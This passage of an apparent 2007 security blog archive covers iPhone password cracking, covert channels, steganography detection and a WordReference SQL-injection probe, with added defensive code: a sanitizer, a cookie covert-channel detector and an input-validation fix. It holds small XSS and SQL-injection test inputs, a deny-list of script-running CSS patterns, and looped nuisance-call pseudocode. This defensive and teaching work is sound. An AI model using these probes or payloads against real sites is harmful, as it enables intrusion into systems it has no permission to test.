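    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/\\(.)/g, '$1')
    .replace(/\s+/g, ' ')
    .toLowerCase();
}

// Reject any style value that could run script or fetch a URL.
function isSafeStyle(value) {
  return !/expression\s*\(|url\s*\(|javascript:|behavior\s*:|-moz-binding|@import/.test(normalizeCss(value));
}

// Only http(s), mailto and same-site relative links survive.
function isSafeHref(value) {
  const v = decodeEntities(value).replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
  return /^(https?:\/\/|mailto:|\/|#)/.test(v);
}

// Rebuild the fragment keeping only allow-listed tags and attributes. Unknown tags
// (script, embed, object, ...) and attributes (style, on*) are dropped; text between
// tags is re-escaped, so entities in the input are shown literally.
function sanitizeHtml(input) {
  const tagRe = /<\/?([a-zA-Z][\w:-]*)((?:\s+[^\s=>]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out += escapeText(input.slice(last, m.index));
    last = tagRe.lastIndex;
    const name = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue; // drop the tag, keep the surrounding text
    if (m[0].startsWith('</')) { out += `</${name}>`; continue; }
    let attrs = '';
    const attrRe = /([^\s=>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const attrName = a[1].toLowerCase();
      const attrValue = a[2] ?? a[3] ?? a[4] ?? '';
      if (!(ALLOWED_ATTRS[name] && ALLOWED_ATTRS[name].has(attrName))) continue;
      if (attrName === 'href' && !isSafeHref(attrValue)) continue;
      attrs += ` ${attrName}="${escapeText(attrValue)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out + escapeText(input.slice(last));
}

// Constructed samples: a scrap carrying a flash object, and an escaped expression().
console.log(sanitizeHtml('<embed src="http://example.invalid/v.swf"> hi <b>there</b>'));
console.log(isSafeStyle('xx:e\\78pression(alert(1))'), isSafeStyle('color: red'));
```

The style check is deliberately a deny-list applied only after normalisation; in a real deployment you would pair it with an allow list of CSS properties, but the decode-before-compare step is what this post's payload defeats when it is missing.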

Sunday, November 25, 2007

Thank You Guys

Hi folks,
I'm proud to announce that I am now part of the BlogSecurity Team.
Grabbed from the BlogSecurity site:


BlogSecurity is the only organization that deals with social networking and web blog security exclusively.
Our goal is to provide you with the security advice, services, tools and critical information that you need to better secure and build your blog.

Tuesday, November 20, 2007

Big Scare from Apple !

During these days lots of blogs (tuaw, heise-security, docpool and so on..) published this agonizing news about Apple. Something wrong happened in the Stocks and Weather applications during the network update phase. A strange IMEI code is passed to apple.com, as you can see in the following picture.




What's happening? Is Apple spying on us? Are there tons of data written with the IMEI? Can they recognize me? Can they understand where I am? etc. etc....
Fortunately, it's not true. The IMEI parameter passed to apple.com is a software ID and it's the same for all the phones. Or so it seems. Unfortunately I've got only one iPhone and I can't make deeper tests. Right now I use Weather and Stocks without any worries, but I'll be more careful until something new comes up.

Interesting reading here.

Sunday, November 18, 2007

AT&T Allows Denial of Service

I've been using AT&T for 4 months. What I saw is that you must pay if you make a call, but also if you receive calls. You must pay also if you 'try' to call, and you must pay if you decide not to answer. Well, you must pay every time!
Is it right? Maybe yes, if your mind thinks of "communications"; it seems wrong if your mind thinks of "services". So, what I know is that AT&T is a "communication oriented" provider, whereas other European network providers are "service oriented". But what about security? If I'm using a "service oriented" network provider, like the EU architecture, I'll pay only if someone answers me. So the following scenario could be assumed as safe:

A call V
network does...... TU...TU...TU...TU
V doesn't answer.
network does....... TU.TU.TU.TU 
A has spent nothing
V has spent nothing

If I'm using a "communication oriented" network provider, I take up the network, so I'll spend even though no one answers me. At the same time, whoever doesn't answer me also takes up the network and so he will spend money like me. In this way, if an attacker wants to make a denial of service on the victim's phone, he could follow this procedure:

for(;;){
Attacker (A) calls Victim(V) (with hidden cell-id)
network does........ TU. (A stops the call)

A has spent $0.x
V has spent $0.x
}

If we assume that the Attacker has more money than the Victim, at the end of the day the Victim is not able to phone. Both A and V will spend the same amount of money. So if an Attacker really wants to make a DoS attack on one or more phones, he can.
Maybe "service oriented" providers are more secure from this point of view.

Saturday, November 17, 2007

Say Hello to SpiderPig

Hi folks,
I know, it isn't security but it's so funny!!
Today, surfing the web, I've seen SpiderPig ..... (or SpiderPork, the Italian version is funnier) on this site and I decided to publish it just for fun! To me it's really amazing! :-D.









Print it, cut it and attach it wherever you want! Here are some little examples:








Enjoy Your SpiderPork !!! :-D

Friday, November 16, 2007

A Restricted Apple Test.

A really restricted test on "addicted to Apple" gave me 85%, ... , not bad ....

85%
It's really funny :-D !

Wednesday, November 14, 2007

Studying covert channels

Covert channels have been a big problem for years. Recently, applied to Electronic Voting Systems, they can threaten democracy. I've found a nice program for understanding how covert channels can work. I've downloaded it here and I've just tried how it works. As usual, just a few screenshots.
The first Mac is 10.0.0.12 and the second one is 10.0.0.13.




The connection




Opening an easy nc connection on both Macs.




Writing something in the first nc shell (10.0.0.12), the message will be forwarded into the second nc shell using covert channels. But, following the Tao's suggestion, what's happening in our communication? The communication starts this way: an easy HTTP GET with the cookie set to "this is a string \r\n", the exact data that I've pushed into the first nc shell (10.0.0.12).





The right answer from 10.0.0.13



The answer from the second nc shell (10.0.0.13) is forwarded to the first nc shell (10.0.0.12) using another covert channel



With the relative data!




It's a very easy example of two different covert channels, the first one using cookies in tx and the other sending TCP data back. I think this example should be really useful for teaching purposes. Maybe it could be interesting to improve it using different channels and protocols, and to upgrade the communication with strong data encryption in order to hide the written data. It should also be interesting to build a kernel-based implementation for modern distributions.
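For teaching purposes the other half of the story is what a proxy or IDS could see. The following is an added detector (my own code, not the tool used in the post) run over constructed HTTP requests shaped like the ones in the screenshots. It applies two checks to the Cookie header: the RFC 6265 grammar (semicolon-separated name=value pairs whose values contain no spaces, control characters, quotes, commas, semicolons or backslashes), which the raw "this is a string " cookie fails, and an allow list of cookie names the server actually issues, which catches a payload that has been re-encoded to satisfy the grammar. The known cookie names, host address and sample requests are constructed.

```javascript
// Added example, not the tool from the post: a detector for a cookie-based covert
// channel, run over constructed sample HTTP requests.
// Check 1: Cookie header must follow RFC 6265 (name=value pairs, cookie-octet values).
// Check 2: every cookie name must be one the server issues (constructed allow list).

const KNOWN_COOKIES = new Set(['sessionid', 'lang', 'csrftoken']);

// cookie-octet per RFC 6265: %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
const COOKIE_OCTETS = /^[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*$/;
// HTTP token characters, which a cookie name must consist of.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Minimal request parser: request line plus headers, body ignored.
function parseRequest(raw) {
  const [head] = raw.split('\r\n\r\n');
  const [requestLine, ...headerLines] = head.split('\r\n');
  const headers = [];
  for (const line of headerLines) {
    const i = line.indexOf(':');
    if (i > 0) {
      headers.push({ name: line.slice(0, i).trim().toLowerCase(), value: line.slice(i + 1).replace(/^ /, '') });
    }
  }
  return { requestLine, headers };
}

// Returns the list of findings for one request; an empty list means nothing suspicious.
function inspectCookies(raw) {
  const { requestLine, headers } = parseRequest(raw);
  const findings = [];
  for (const h of headers.filter(x => x.name === 'cookie')) {
    for (const pair of h.value.split(/;\s*/)) {
      if (pair === '') continue;
      const eq = pair.indexOf('=');
      if (eq < 0) {
        findings.push({ requestLine, pair, reason: 'no name=value form' });
        continue;
      }
      const name = pair.slice(0, eq);
      const value = pair.slice(eq + 1);
      if (!TOKEN.test(name)) findings.push({ requestLine, pair, reason: 'cookie name is not a token' });
      else if (!KNOWN_COOKIES.has(name)) findings.push({ requestLine, pair, reason: `unknown cookie name ${name}` });
      if (!COOKIE_OCTETS.test(value)) findings.push({ requestLine, pair, reason: 'value has characters outside cookie-octet' });
    }
  }
  return findings;
}

// Constructed sample traffic towards the second host of the post.
const SAMPLES = [
  // ordinary browser request: passes both checks
  'GET /index.html HTTP/1.1\r\nHost: 10.0.0.13\r\nCookie: sessionid=a1b2c3; lang=en\r\n\r\n',
  // the channel from the post: the typed text is sent as the raw Cookie header value
  'GET / HTTP/1.1\r\nHost: 10.0.0.13\r\nCookie: this is a string \r\n\r\n',
  // a grammar-conforming variant: the same text hex-encoded under a made-up cookie name
  'GET / HTTP/1.1\r\nHost: 10.0.0.13\r\nCookie: sessionid=a1b2c3; zz=746869732069732061207374726967\r\n\r\n',
];

function scan(requests) {
  return requests.map(inspectCookies);
}

for (const findings of scan(SAMPLES)) {
  console.log(findings.length === 0 ? 'clean' : findings.map(f => `${f.pair}: ${f.reason}`).join('; '));
}
```

The grammar check alone is only a tripwire for careless tools; the name allow list is what turns the detector into a policy, since a server knows exactly which cookies it has ever set and anything else in the header is data that did not come from it.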

Verizon has confusing ideas

Thanks to Justin:



It seems ridiculous and quite impossible, but nope, it's true. It happens in America too :-D

Monday, November 12, 2007

The first MacBook Pro with a 64GB SSD?

Here is the original experience.




One of the coolest experiments I've ever seen!! A MacBook Pro with a solid-state disk installed without any complications, as you can read in the original post. I guess Apple won't wait much longer!

Friday, November 9, 2007

iPHone Password Cracking.

Hi folks, yesterday I bought my first iPhone.
It's great, with a lot of functionality, and security is really high :-D :-D :-D. But while I was looking inside the file system, just to study the embedded architecture ..., I noticed a mysterious file named master.password inside the /private/etc/ folder.




Well, intrigued, I opened it and .... yep, an old passwd-style file appeared in front of me.





Wow, it's really secure!! Yep, the comment says it's for single-user mode but..... the iPhone is an embedded system, it's running in single-user mode!!! :-D. So it could be interesting to see how secure the password is.... Maybe Apple put in a really strong password!
Let me try with John on my poor old PowerBook G4.




Ohhh, the password is really, really strong and so hard to guess; how could hackers have discovered it?!? (I'm kidding)
Well, I'd like to highlight two posts that answer this rhetorical question: the first one is an old post of mine and the second one is a great post on password security by Ann. Security evangelists are really useful in the current security era.


Voting machines cast votes for the wrong candidate.

Well,...
there are a lot of people working to improve electronic voting security. But on the other hand there are lots of people who don't care about it! It's 'pretty' incredible!

Via Wired 
Votes cast yesterday on e-voting machines made by Election Systems & Software went to the wrong candidates, according to officials in Lawrence County, Ohio.

Wednesday, November 7, 2007

Leopard Data Loss BUG













This news is two days old, but I haven't found time before now to say thanks to Tom. Grabbed from here: "Leopard’s Finder has a glaring bug in its directory-moving code, leading to horrendous data loss if a destination volume disappears while a move operation is in action. I first came across it when Samba crashed while I was moving a directory from my desktop over to a Samba mount on my FreeBSD server." Here we go, it's Leopard bug time! Really good personal work. The root cause is an ordering problem: a move across volumes is a copy followed by a delete, and the delete must only run once the copy has been confirmed on the destination. There is also an avi for people who don't like to read.
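As an added example of the safe ordering (my own code, neither Apple's nor Tom's), here is a cross-volume move that copies, flushes to disk, verifies the copy byte for byte and only then removes the source; if the destination disappears at any point, the original is left untouched. A directory move would apply the same steps per file and remove the source tree only after every file has been verified. Names and the temporary-directory demo are this example's own.

```python
"""Added example: a move that cannot lose data when the destination vanishes.

Order of operations: copy -> fsync -> verify -> rename into place -> delete source.
Any failure before the last step leaves the source exactly as it was.
"""
import hashlib
import os
import shutil
import tempfile


def _digest(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def safe_move(src: str, dst_dir: str) -> str:
    """Move file `src` into directory `dst_dir` and return the new path."""
    if not os.path.isdir(dst_dir):
        raise FileNotFoundError(f"destination {dst_dir!r} is not available")
    dst = os.path.join(dst_dir, os.path.basename(src))
    tmp = dst + ".part"
    try:
        with open(src, "rb") as fin, open(tmp, "wb") as fout:
            shutil.copyfileobj(fin, fout)
            fout.flush()
            os.fsync(fout.fileno())        # the bytes are on the destination medium
        if _digest(tmp) != _digest(src):
            raise IOError("copy does not match source")
        os.rename(tmp, dst)                # atomic within the destination filesystem
    except Exception:
        # Whatever went wrong, the source is never touched.
        if os.path.exists(tmp):
            os.remove(tmp)
        raise
    os.remove(src)                         # only now is the source redundant
    return dst


def demo() -> dict:
    """Exercise both paths in a throwaway directory (constructed data)."""
    base = tempfile.mkdtemp()
    payload = b"hello" * 1000
    src = os.path.join(base, "a.txt")
    with open(src, "wb") as f:
        f.write(payload)
    out = os.path.join(base, "out")
    os.mkdir(out)
    moved = safe_move(src, out)
    with open(moved, "rb") as f:
        moved_ok = f.read() == payload

    src2 = os.path.join(base, "b.txt")
    with open(src2, "wb") as f:
        f.write(b"x")
    failed = False
    try:
        safe_move(src2, os.path.join(base, "missing"))   # destination is gone
    except FileNotFoundError:
        failed = True
    result = {
        "moved_content_ok": moved_ok,
        "source_removed": not os.path.exists(src),
        "failed_move_raised": failed,
        "failed_move_kept_source": os.path.exists(src2),
    }
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print(demo())
```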



Monday, November 5, 2007

How to detect Steganography.


Hi folks,
During the last week I've found some interesting stuff on steganography. I want to discuss detection rather than steganography itself, so if you're interested in this post please read the Wikipedia definition linked above.


Well, I've seen lots of people who don't know anything about steganography or how to detect it. I know there is free software like Stegdetect that can easily tell whether a file has been tampered with, but as usual I like to see with my own hands what happens inside the file. So over the last few days I've analyzed some file types with and without steganography.
Let me start with classic examples like .gif images.

This is a normal GIF image with nothing hidden inside.


And this one is the same picture with some plain text hidden inside.




Human eyes can't see the difference between the two pictures, but a hex editor can!!! So if we open the normal .gif image and the modified one we can compare the differences and understand how to detect steganography inside a GIF image.

And, yep, we got it! As you can see from the following pictures, the first bytes are different!
This is the first picture's hexadecimal view; you can read "47 49 46 38", which is "GIF8" in ASCII, the start of the GIF87a/GIF89a signature.


This is the second picture's hexadecimal view; you can't see the "GIF" bytes ...



Well, it's so easy to detect!!! Let me try with other picture formats, for instance .jpg files. Apparently there is no similarity between a normal JPG and a modified one, but if you study the JPEG header and body format you discover that every JPEG image ends with the bytes "FF D9" (the End Of Image marker). So, if that's true, we must find "FF D9" at the end of the normal JPG and other stuff after it in the modified one. De facto it's true. Safe JPG following:



Modified JPG following:


More examples.
PNG is another important image format; the PNG header is well known, so it should be easy to detect injections. It's true again: the difference in the header is impressive. Normal PNG format.



And the fake PNG header.



So here we are... It's not so difficult to tell whether an image has been tampered with! Some steganography software is smarter than others, but it's hard to lie to a hex editor. One caveat: the checks above only catch tools that rewrite the header or append data after the end-of-image marker; a tool that only alters the least significant bits of the pixel data leaves the header and trailer perfectly valid, and that kind of hiding has to be found statistically, which is what Stegdetect does. Anyway it's really different for MP3, exe and other stuff like that.
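Here is the hex-editor routine above turned into code, as an added example (mine, not the post's own): for GIF, JPEG and PNG it checks that the signature is intact and that the file ends where the format says it ends, and for PNG it walks the chunk list so that anything after IEND, or a chunk with a bad CRC, is reported. The tiny sample images are built inline and are constructed for this example. As noted above, it only finds rewritten headers and appended payloads; LSB-style hiding keeps the structure valid and needs statistical analysis.

```python
"""Added example: structural checks for hidden data in GIF, JPEG and PNG files.

detect_hidden(data) returns a list of findings; [] means the structure is clean.
Sample images below are constructed for this example.
"""
import struct
import zlib


def detect_hidden(data: bytes) -> list[str]:
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return _check_png(data)
    if data.startswith(b"\xff\xd8"):
        return _check_jpeg(data)
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return _check_gif(data)
    return ["unknown or rewritten header: " + data[:8].hex(" ")]


def _check_png(data: bytes) -> list[str]:
    """Walk length/type/body/CRC chunks; the file must end right after IEND."""
    out, pos = [], 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc) < 4:
            out.append("truncated chunk " + ctype.decode("latin1"))
            return out
        if struct.pack(">I", zlib.crc32(ctype + body)) != crc:
            out.append("bad CRC in chunk " + ctype.decode("latin1"))
        pos += 12 + length
        if ctype == b"IEND":
            if pos < len(data):
                out.append(f"{len(data) - pos} bytes after IEND")
            return out
    out.append("no IEND chunk")
    return out


def _check_jpeg(data: bytes) -> list[str]:
    """Skip the length-prefixed segments up to Start Of Scan (so an EXIF thumbnail's
    own FF D9 is not mistaken for the end), then the first FF D9 in the scan data
    is the real End Of Image and nothing may follow it."""
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return [f"expected a marker at offset {pos}, got {data[pos]:#04x}"]
        marker = data[pos + 1]
        if marker == 0xDA:
            break
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
    else:
        return ["no Start Of Scan marker"]
    eoi = data.find(b"\xff\xd9", pos)
    if eoi < 0:
        return ["no EOI marker (FF D9)"]
    if eoi + 2 != len(data):
        return [f"{len(data) - eoi - 2} bytes after EOI"]
    return []


def _check_gif(data: bytes) -> list[str]:
    """A GIF ends with the trailer byte 0x3B; appended data pushes it off the end."""
    if data[-1] != 0x3B:
        return ["file does not end with the GIF trailer (3B)"]
    return []


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def sample_png() -> bytes:
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)          # 1x1, 8-bit grey
    return (b"\x89PNG\r\n\x1a\n" + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _png_chunk(b"IEND", b""))


def sample_jpeg() -> bytes:
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    return b"\xff\xd8" + app0 + sos + b"\x12\x34\xff\x00\x56" + b"\xff\xd9"


def sample_gif() -> bytes:
    return b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0) + b"\x3b"


if __name__ == "__main__":
    for name, img in (("png", sample_png()), ("jpeg", sample_jpeg()), ("gif", sample_gif())):
        print(name, detect_hidden(img), detect_hidden(img + b"secret"))
```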

Friday, November 2, 2007

Porn to break Captchas

Via BBC (whole article).

Spammers have created a Windows game which shows a woman in a state of undress when people correctly type in text shown in an accompanying image.
The scrambled text images come from sites which use them to stop computers automatically signing up for accounts that can be put to illegal use.
By getting people to type in the text the spammers can take over the accounts and use them to send junk mail.
This example shows why security evangelists are so important! This technique was introduced some years ago, as you can read in the following links:
It's not a mystery, at least for security evangelists ... ... ... ... ... ... ...

Wednesday, October 31, 2007

Yet Another Interesting Linux Distribution



It may look like a hard distribution to use, but it isn't. ZeroShell is one of the easiest and most useful server-oriented distributions I've ever seen. Services like RADIUS, Kerberos and a captive portal are usually quite difficult to set up and to use; thanks to ZeroShell their configuration and set-up is really easy and fast. Yep, fast. Right now one of the major problems working against Linux is the slow set-up of services. On other systems it's pretty easy to install and configure a whole service; on Linux platforms instead, especially if you are an old-style geek, it's difficult and takes a lot of time. Well, that's no longer true thanks to ZeroShell. Download it and try it; keep it and throw out your old systems :-D. 
Grabbed from the site: http://www.zeroshell.net/eng/


Zeroshell is a small Linux distribution for servers and embedded devices aimed at providing the main network services a LAN requires. It is available in the form of Live CD or Compact Flash image and you can configure and administer it using your web browser. The main features are listed below:

RADIUS server for providing secure authentication and automatic management of the encryption keys to the Wireless 802.11b, 802.11g and 802.11a networks supporting the 802.1x protocol in the EAP-TLS, EAP-TTLS and PEAP form or the less secure authentication of the client MAC Address; WPA with TKIP and WPA2 with CCMP (802.11i compliant) are supported too; the RADIUS server may also, depending on the username, group or MAC Address of the supplicant, allow the access on a preset 802.1Q VLAN;

Captive Portal to support the web login on wireless and wired networks. Zeroshell acts as gateway for the networks on which the Captive Portal is active and on which the IP addresses (usually belonging to private subnets) are dynamically assigned by the DHCP. A client that accesses this private network must authenticate itself through a web browser using Kerberos 5 username and password before the Zeroshell's firewall allows it to access the public LAN. The Captive Portal gateways are often used to provide authenticated Internet access in the HotSpots in alternative to the 802.1X authentication protocol too complicated to configure for the users. Zeroshell implements the functionality of Captive Portal in native way, without using other specific software as NoCat or Chillispot;

QoS (Quality of Service) management and traffic shaping to control traffic over a congested network. You will be able to guarantee the minimum bandwidth, limit the max bandwidth and assign a priority to a traffic class (useful in latency-sensitive network applications like VoIP). The previous tuning can be applied on Ethernet Interfaces, VPNs, bridges and VPN bondings. It is possible to classify the traffic by using the Layer 7 filters that allow the Deep Packet Inspection (DPI) which can be useful to shape VoIP and P2P applications;

Host-to-lan VPN with L2TP/IPsec in which L2TP (Layer 2 Tunneling Protocol) authenticated with Kerberos v5 username and password is encapsulated within IPsec authenticated with IKE that uses X.509 certificates;

Lan-to-lan VPN with encapsulation of Ethernet datagrams in SSL/TLS tunnel, with support for 802.1Q VLAN and configurable in bonding for load balancing (band increase) or fault tolerance (reliability increase);

Router with static and dynamic routes (RIPv2 with MD5 or plain text authentication and Split Horizon and Poisoned Reverse algorithms);

802.1d bridge with Spanning Tree protocol to avoid loops even in the presence of redundant paths;

802.1Q Virtual LAN (tagged VLAN);

Firewall Packet Filter and Stateful Packet Inspection (SPI) with filters applicable in both routing and bridging on all type of interfaces including VPN and VLAN;

It is possible to reject or shape P2P File Sharing traffic by using IPP2P iptables module in the Firewall and QoS Classifier;

NAT to use private class LAN addresses hidden on the WAN with public addresses;

TCP/UDP port forwarding (PAT) to create Virtual Servers. This means that real server cluster will be seen with only one IP address (the IP of the virtual server) and each request will be distributed with Round Robin algorithm to the real servers;

Multizone DNS server with automatic management of the Reverse Resolution in-addr.arpa;

Multi subnet DHCP server with the possibility to fix IP depending on client's MAC address;
PPPoE client for connection to the WAN via ADSL, DSL and cable lines (requires a suitable MODEM);

Dynamic DNS client used to easily reach the host on WAN even when the IP is dynamic;

NTP (Network Time Protocol) client and server for keeping host clocks synchronized;

Syslog server for receiving and cataloging the system logs produced by the remote hosts including Unix systems, routers, switches, WI-FI access points, network printers and others compatible with the syslog protocol;

Kerberos 5 authentication using an integrated KDC and cross-authentication between realms;
LDAP, NIS and RADIUS authorization;

X509 certification authority for issuing and managing electronic certificates;

Unix and Windows Active Directory interoperability using LDAP and Kerberos 5 cross realm authentication.

Tuesday, October 30, 2007

Automatic Jailbreak For iPhone and iPod Touch

Another incredible way to jailbreak and to install Installer on your iPhone/iPod Touch.
Until now you had to follow easy but long guides and pay attention to every step. Well, now it's really easy: just open Safari and click on Jailbreakme.com!! Keep in mind what that means, though: a web page that installs software just by being visited is, by definition, remote code execution through Safari, and a malicious site could use the same hole.




Grabbed From http://www.modmyiphone.com

It's as easy as opening Safari on your iPhone/iPod Touch, and browsing to jailbreakme.com. That's it! Scroll down, and hit "Install AppSnapp". Safari should disappear, and pop you back to the Home screen. Wait patiently for a minute - don't touch anything until it pops you back to the Slide to Unlock screen.

Slide to unlock, and Installer.app will be installed on your iPhone/iPod Touch! You should prob install BSD Subsystem, Community Sources, and OpenSSH, and upgrade Installer.app if needed.

Erica Sadun from TUAW also refreshes the good tip that combining Open SSH and sshfs (part of Mac Fuse) allows you to drag and drop files to/from your iPod Touch/iPhone directly from Finder.



Thanks so much guys!

Monday, October 29, 2007

Wordreference.com Vulnerable

Hi all,
today I've found two different kinds of vulnerability on www.wordreference.com .
As you know, WordReference is one of the most important free dictionaries on the net, and thanks to it I've learned a little English; for this reason I'll not post real examples of how to exploit it, just a proof that the problem exists.
The first vulnerability is a classic SQL injection, while the second one looks like a classic buffer overflow on an arithmetic operation. First of all, search for a really common word like "a": you'll get a lot of translations, and at the end of the page you'll find the "next 100" link, as the following image shows






Clicking this link and looking at the URL bar you'll see something like this






Try changing the "start" parameter to the value "-1" and here we go! You should see this:



But that's not all: if you also pass a long string, in order to overrun the pointer arithmetic behind it, like the following one



you'll see another error like the following one



This is another bad example of input checking... Both errors have the same cause: the "start" parameter goes straight from the URL into the query and into the arithmetic without ever being checked. A lot of problems could be solved just by validating it as a bounded non-negative integer and binding it as a query parameter instead of pasting it into the SQL text.
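To show the fix concretely, here is an added example (mine, not WordReference's code) of the pagination parameter handled the wrong way and the right way. The vulnerable builder drops the raw "start" value into the SQL text, so "-1" or a long string of garbage reaches the database; the hardened version parses it as a bounded integer first and binds it as a parameter. sqlite3 stands in for the site's real database, and the table and column names are assumptions of this example.

```python
"""Added example: pagination 'start' parameter, vulnerable vs. validated.

Table 'entries(word, translation)' and the page size are this example's assumptions;
the in-memory sqlite database is constructed data.
"""
import sqlite3

PAGE = 100          # rows per page, as the site's "next 100" link suggests
MAX_START = 100_000 # assumed upper bound for the offset


def build_query_vulnerable(start: str) -> str:
    """User input pasted straight into the statement: '-1' and worse get through."""
    return f"SELECT word, translation FROM entries WHERE word LIKE 'a%' LIMIT {start}, {PAGE}"


def parse_start(raw: str) -> int:
    """Accept only a plain ASCII non-negative integer within the allowed range."""
    if not isinstance(raw, str) or not raw or len(raw) > 6 or not (raw.isascii() and raw.isdigit()):
        raise ValueError(f"invalid start parameter: {raw!r}")
    value = int(raw)
    if value > MAX_START:
        raise ValueError(f"start {value} is beyond the last page")
    return value


def fetch_page(conn: sqlite3.Connection, raw_start: str) -> list[tuple]:
    """Hardened path: validate first, then bind; the SQL text never changes."""
    start = parse_start(raw_start)
    cur = conn.execute(
        "SELECT word, translation FROM entries WHERE word LIKE 'a%' "
        "ORDER BY word LIMIT ? OFFSET ?",
        (PAGE, start),
    )
    return cur.fetchall()


def sample_db() -> sqlite3.Connection:
    """Constructed dictionary table with 250 entries starting with 'a'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (word TEXT, translation TEXT)")
    conn.executemany("INSERT INTO entries VALUES (?, ?)",
                     [(f"a{i:04d}", f"translation {i}") for i in range(250)])
    return conn


if __name__ == "__main__":
    conn = sample_db()
    print(build_query_vulnerable("-1"))                 # the string the database would see
    print(len(fetch_page(conn, "200")), "rows on the last page")
    for bad in ("-1", "1 OR 1=1", "9" * 40):
        try:
            fetch_page(conn, bad)
        except ValueError as e:
            print("rejected:", e)
```

The length cap in `parse_start` is what stops the second error too: a 40-digit string never reaches `int()` or any arithmetic, so there is nothing left to overflow.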